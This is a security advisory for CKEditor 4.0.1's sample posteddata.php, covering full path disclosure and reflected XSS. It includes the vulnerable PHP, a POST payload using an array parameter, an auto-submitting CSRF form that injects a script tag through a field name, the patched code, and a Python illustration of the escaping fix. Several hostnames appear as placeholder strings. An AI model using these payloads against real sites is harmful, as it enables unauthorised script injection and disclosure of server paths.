Affected software: ckeditor 4.0.1 standard
Download URL: http://download.cksource测试数据/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulnerability type: Full Path Disclosure && XSS
===========================================
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html >
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor测试数据/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample — CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor — Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field Name</th>
<th>Value</th>
</tr>
</thead>
<?php
if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
else
$postedValue = htmlspecialchars( $value ) ;
?>
<tr>
<th style="vertical-align: top"><?php echo $sForm?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor测试数据/">http://ckeditor测试数据</a>
</p>
<p id="copy">
Copyright © 2003-2013, <a class="samples" href="http://cksource测试数据/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>
=============SNIP ENDS HERE====================
FULL Path Disclosure example:
URL: http://HdhCmsTest2cto测试数据 /admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST
HEADERS:
Host: hacker1.own
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
$_POST DATA TO SEND:
bangbangbang[]=PATH DISCLOSURE
Result:
Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
=================================================
CSRF+XSS
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>
=================================================
Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png
=================================================
And here is the fixed version: /ckeditor/samples/assets/posteddata.php
================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor测试数据/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample — CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor — Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field Name</th>
<th>Value</th>
</tr>
</thead>
<?php
if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
else
$postedValue =htmlspecialchars((string) $value ) ;
?>
<tr>
<th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor测试数据/">http://ckeditor测试数据</a>
</p>
<p id="copy">
Copyright © 2003-2013, <a class="samples" href="http://cksource测试数据/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>
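The two defects above come down to one loop: PHP turns a `name[]=` parameter into an array, which the original sample handed straight to htmlspecialchars() (the resulting warning carried the script's full path), and the field name went into the <th> unescaped. The Python below is an added illustration, not CKEditor code: it models how PHP fills $_POST from a urlencoded body, then renders the table rows the way the fixed sample does, stringifying arrays and escaping both name and value. The sample request body is constructed from the two proof-of-concept inputs in this advisory.

```python
from html import escape
from urllib.parse import unquote_plus

# Constructed body: the FPD probe and the XSS field name from the advisory,
# URL-encoded as a browser would send an application/x-www-form-urlencoded POST.
SAMPLE_BODY = (
    "bangbangbang[]=PATH+DISCLOSURE"
    "&%3Cscript%3Ealert%28%27AkaStep%27%29%3B%3C%2Fscript%3E=SENDF"
)


def parse_php_post(body: str) -> dict:
    """Decode a urlencoded body the way PHP builds $_POST (only the trailing
    '[]' list form is modelled, not nested a[b][c] keys). A key ending in '[]'
    collects its values into a list, which is why 'bangbangbang[]=...' reaches
    the script as an array rather than a string."""
    post = {}
    for pair in body.split("&"):
        if not pair:
            continue
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        if key.endswith("[]"):
            post.setdefault(key[:-2], []).append(val)
        else:
            post[key] = val
    return post


def to_text(value) -> str:
    """Flatten list values before escaping. The original sample passed the raw
    array to htmlspecialchars(), whose warning disclosed the script path; the
    fix casts to string first, which this mirrors."""
    if isinstance(value, list):
        return ", ".join(to_text(v) for v in value)
    return str(value)


def render_rows(post: dict) -> str:
    """Render posteddata.php's table rows with BOTH the field name and the
    value HTML-escaped. The original escaped only the value, so a crafted
    field name was reflected verbatim into the <th> element."""
    rows = []
    for name, value in post.items():
        th = escape(to_text(name), quote=True)
        td = escape(to_text(value), quote=True)
        rows.append(f"<tr><th>{th}</th><td><pre>{td}</pre></td></tr>")
    return "\n".join(rows)


def demo() -> str:
    """Parse the constructed body and render it safely."""
    return render_rows(parse_php_post(SAMPLE_BODY))
```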